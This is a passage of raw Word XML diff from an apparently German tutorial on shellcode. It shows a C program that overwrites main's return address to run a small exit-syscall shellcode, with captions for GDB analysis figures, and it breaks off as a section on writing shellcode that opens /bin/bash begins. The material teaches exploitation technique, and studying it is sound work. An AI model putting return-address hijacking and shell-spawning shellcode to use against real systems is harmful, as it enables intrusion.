+              <v:shape id="Textfeld 4" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.15pt;width:306.25pt;height:197.65pt;z-index:251663360;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> &lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdio.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[] = "\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xbb</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\x14\x00\x00\x00"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">                   "\xb8\x01\x00\x00\x00"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">                   "\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xcd</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\x80";</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(){</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> *</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ret</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ret</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> = (</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> *)&amp;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ret</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> +2;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    (*</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ret</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>) = (</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">;    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Verschiebt nach dem Start des Programms, die Speicheradresse des </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shellcodes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in die Return Adresse, und überschreibt die eigentliche Return Adresse</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Analyse mit GDB</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295205A1" wp14:editId="4AAEACC2">
+            <wp:extent cx="3619500" cy="1752600"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="5" name="Grafik 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="part3_1.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3619500" cy="1752600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Abbildung </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Disassemble</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> der Mainfunktion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7558FEBB" wp14:editId="723147CA">
+            <wp:extent cx="5746159" cy="4497105"/>
+            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
+            <wp:docPr id="6" name="Grafik 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="part3_2.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5763437" cy="4510627"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Abbildung </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> - ESP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>register</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> sowie Code an der aktuellen RET Adresse</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C0684C" wp14:editId="606DF291">
+            <wp:extent cx="5667375" cy="952500"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="7" name="Grafik 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="part3_3.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5667375" cy="952500"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Abbildung </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> - ESP nach Überschreibung des RET Wertes</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E57BBBC" wp14:editId="06CA0759">
+            <wp:extent cx="5695950" cy="2009775"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="8" name="Grafik 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="part3_4.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5695950" cy="2009775"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Abbildung </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Disassemble</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> der Aktuellen RET Adresse - zeigt auf unseren </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4F81BD" w:themeColor="accent1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> zum Öffnen einer Shell schreiben</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>2396064</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>130936</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="685800" cy="2396490"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
+                <wp:wrapNone/>
+                <wp:docPr id="10" name="Geschweifte Klammer rechts 10"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="685800" cy="2396490"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rightBrace">
+                          <a:avLst>
+                            <a:gd name="adj1" fmla="val 85895"/>
+                            <a:gd name="adj2" fmla="val 50839"/>
+                          </a:avLst>
+                        </a:prstGeom>
+                        <a:ln w="25400">
+                          <a:solidFill>
+                            <a:schemeClr val="tx1"/>
+                          </a:solidFill>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="1">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="tx1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t88" coordsize="21600,21600" o:spt="88" adj="1800,10800" path="m,qx10800@0l10800@2qy21600@11,10800@3l10800@1qy,21600e" filled="f">
+                <v:formulas>
+                  <v:f eqn="val #0"/>
+                  <v:f eqn="sum 21600 0 #0"/>
+                  <v:f eqn="sum #1 0 #0"/>
+                  <v:f eqn="sum #1 #0 0"/>
+                  <v:f eqn="prod #0 9598 32768"/>
+                  <v:f eqn="sum 21600 0 @4"/>
+                  <v:f eqn="sum 21600 0 #1"/>
+                  <v:f eqn="min #1 @6"/>
+                  <v:f eqn="prod @7 1 2"/>
+                  <v:f eqn="prod #0 2 1"/>
+                  <v:f eqn="sum 21600 0 @9"/>
+                  <v:f eqn="val #1"/>
+                </v:formulas>
+                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;21600,@11;0,21600" textboxrect="0,@4,7637,@5"/>
+                <v:handles>
+                  <v:h position="center,#0" yrange="0,@8"/>
+                  <v:h position="bottomRight,#1" yrange="@9,@10"/>
+                </v:handles>
+              </v:shapetype>
+              <v:shape id="Geschweifte Klammer rechts 10" o:spid="_x0000_s1026" type="#_x0000_t88" style="position:absolute;margin-left:188.65pt;margin-top:10.3pt;width:54pt;height:188.7pt;z-index:251665408;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" o:gfxdata="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" adj="5309,10981" strokecolor="black [3213]" strokeweight="2pt"/>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>130936</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1946080" cy="2396999"/>
+                <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
+                <wp:wrapNone/>
+                <wp:docPr id="9" name="Textfeld 9"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1946080" cy="2396999"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> &lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdio.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> &lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdlib.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>()</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>{</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> *</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>args</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[2];</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>args</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[0]="/bin/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>bash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>";</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
